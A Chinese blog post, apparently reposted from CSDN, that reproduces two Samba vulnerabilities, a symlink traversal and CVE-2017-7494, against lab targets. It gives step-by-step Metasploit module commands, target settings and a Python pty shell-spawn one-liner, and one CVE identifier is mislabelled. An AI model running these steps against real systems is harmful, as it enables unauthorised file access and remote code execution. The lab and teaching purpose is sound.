linux samba 漏洞 exp,smaba漏洞总结
由于我无法确定具体影响的具体版本,所以samba版本在4.6.4之下都视为有漏洞存在。
1,Samba任意文件访问漏洞(CNA-2004-0815)
漏洞简介
Samba是一个开源/免费软件套件,为SMB / CIFS客户提供无缝文件和打印服务。远程利用Samba中的输入验证漏洞允许攻击者访问指定共享路径之外的文件和目录。
漏洞利用条件
漏洞使用了samba软件套件,通常在445端口或者139端口。
影响版本
Samba版本 2.20a-3.0.2a
不包括3.0.7 和 2.2.12
经过检测,3.x版本都有可能存在该漏洞。
漏洞危害
攻击者漏洞利用此漏洞直接读取目标系统上的任意文件。
漏洞验证
bwapp靶机A5的第一个漏洞
首先在kali使用smbclient连接bwapp靶机,确定其版本。
smbclient -L //192.168.174.131
然后直接使用msf进行漏洞验证即可:
search samba
漏洞很多,我们使用的是第一个:
use auxiliary/admin/smb/samba_symlink_traversal
show options
set rhost 192.168.174.131
set smbshare tmp
exploit
漏洞利用成功:
接下来使用smbclient直接连接:
smbclient //192.168.174.131/tmp/
连接成功后即可访问文件了:
cd 到rootfs后就可以访问全盘文件了:
漏洞验证完毕。
其实这里也可以使用其他模块获取一个session。
use exploit/unix/misc/distcc_exec
show options
set rhost 192.168.174.131
exploit
成功返回一个session,可以执行任意命令:
python -c "import pty;pty.spawn('/bin/bash')"
执行该命令返回一个终端。
复现完成。
2,Samba远程代码执行漏洞(CVE-2017-7494)
漏洞简介
Samba是在Linux和UNIX系统上实现SMB协议的一个软件,不少IoT设备也使用了Samba。2017年5月24日Samba发布了4.6.4版本,修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,攻击者可以利用该漏洞在目标服务器上执行任意代码。 2017年5月25日hdm给metasploit提交了该漏洞的exp。 2017年5月25日openwrt发布了针对该漏洞的修复补丁,许多IoT设备同样受该漏洞影响。
漏洞利用条件
服务端共享目录有访问权限。
需要对服务器上写一个恶意文件并知道该文件的物理路径
服务器打开了文件/打印机共享端口445,让其能够在公网上访问
影响版本
Samba 3.5+ <4.6.4 <4.5.10 <4.4.14
漏洞复现
使用的是vulapps中的靶机,直接进入该目录,通过docker-compose up -d创建靶机:
docker启动成功后,直接在msf中调用模块进行session建立:
search CVE-2017-7494
use exploit/linux/samba/is_known_pipename
show options
set rhost 192.168.174.130
run
会话成功建立,并且可以执行命令:
3,其他漏洞
期间还发生过许多其他漏洞,比如CVE-2007-2447,等等。
标签:总结,Samba,192.168,漏洞,samba,版本,2017,smaba
来源: https://blog.csdn.net/v01cano/article/details/90703741
linux samba 漏洞 exp,smaba漏洞总结相关推荐
- Dirty Pipe – Linux 内核本地提权漏洞
一.漏洞简介 CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞.攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root ...
- Linux Kernel 远程代码执行漏洞(CVE-2022-47939)
Linux Kernel 远程代码执行漏洞(CVE-2022-47939) CVE-2022-47939 据Security Affairs消息,近期披露的一个严重 Linux 内核漏洞会影响 SMB ...
- Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328
Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328 文章目录 Linux Privilege Esca ...
- Linux Exploit系列之三 Off-By-One 漏洞 (基于栈)
Off-By-One 漏洞 (基于栈) 原文地址:https://bbs.pediy.com/thread-216954.htm 什么是off by one? 将源字符串复制到目标缓冲区可能会导致of ...
- linux命令注入,Linux kernel本地命令注入漏洞
Linux kernel本地命令注入漏洞 2005-10-19 eNet&Ciweek Linux kernel 2.2.6 Linux kernel 2.2.5 Linux kernel 2 ...
- Linux下的格式化字符串漏洞利用姿势
[转]http://www.cnblogs.com/Ox9A82/p/5429099.html linux最早的漏洞防护机制nx-stack刚刚出现后就有人想出了突破方法.那就是只有栈是不可执行,而除 ...
- Linux Kernel ‘install_user_keyrings()’竞争条件漏洞
漏洞名称: Linux Kernel 'install_user_keyrings()'竞争条件漏洞 CNNVD编号: CNNVD-201303-141 发布时间: 2013-03-11 更新时间: ...
- 【技术人快报】美军计划换用Linux系统+安卓系统“克隆漏洞”曝光
2018年01月11日 星期四 [技术人快报181期] 导读:美军计划换用Linux系统+安卓系统"克隆漏洞"曝光 [每日一句] 努力做一个可爱的人.不埋怨谁,不嘲笑谁,也不羡慕谁 ...
- Samba远程代码执行漏洞(CVE-2017-7494)复现
简要记录一下Samba远程代码执行漏洞(CVE-2017-7494)环境搭建和利用的过程,献给那些想自己动手搭建环境的朋友.(虽然已过多时) 快捷通道:Docker ~ Samba远程代码执行漏洞(C ...
- Kali Linux 秘籍 第六章 漏洞利用
第六章 漏洞利用 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 一旦我们完成了漏洞扫描步骤,我们就了解了必要的知识 ...
最新文章
- 私有化预期终于落地,海尔智家将迎来更多可能!
- linux grub设置cpu频率,Linux:使用性能调控器时,为什么CPU频率会发生波动?
- linux 下脚本查看带宽 (不需要安装其他工具包)
- 精美UI版iApp对接hybbs论坛功能APP源码
- Yearn核心开发者:YFI铸币提案几乎准备就绪
- Oracle 与 MySql 区别
- 第二章 吸取jQuery之选择器和包装集
- mysql远程连接出错
- mac计算机如何调出来,新买的Mac电脑怎么设置?需完成这6步操作
- SpringCloud 进阶之Eureka(服务注册和发现)
- 智课雅思词汇---十九、前缀se是什么意思
- 葫芦兄弟java7723_雪人兄弟(官方正版)
- python 读取zip包中的数据
- xz2p更新android 9,索尼 XZ2 迎来安卓 9.0 更新,但少了全面屏手势
- linux脚本 set env,shell文件中set setenv source
- element-ui 表格使用多选 如何回显打勾
- 优思学院|六西格玛是什么?六西格玛的精髓和原则是什么?
- 作者领读 | Prometheus云原生监控
- 一些kaldi常用的术语和命令(一)
- 实例004 计算正方形的边长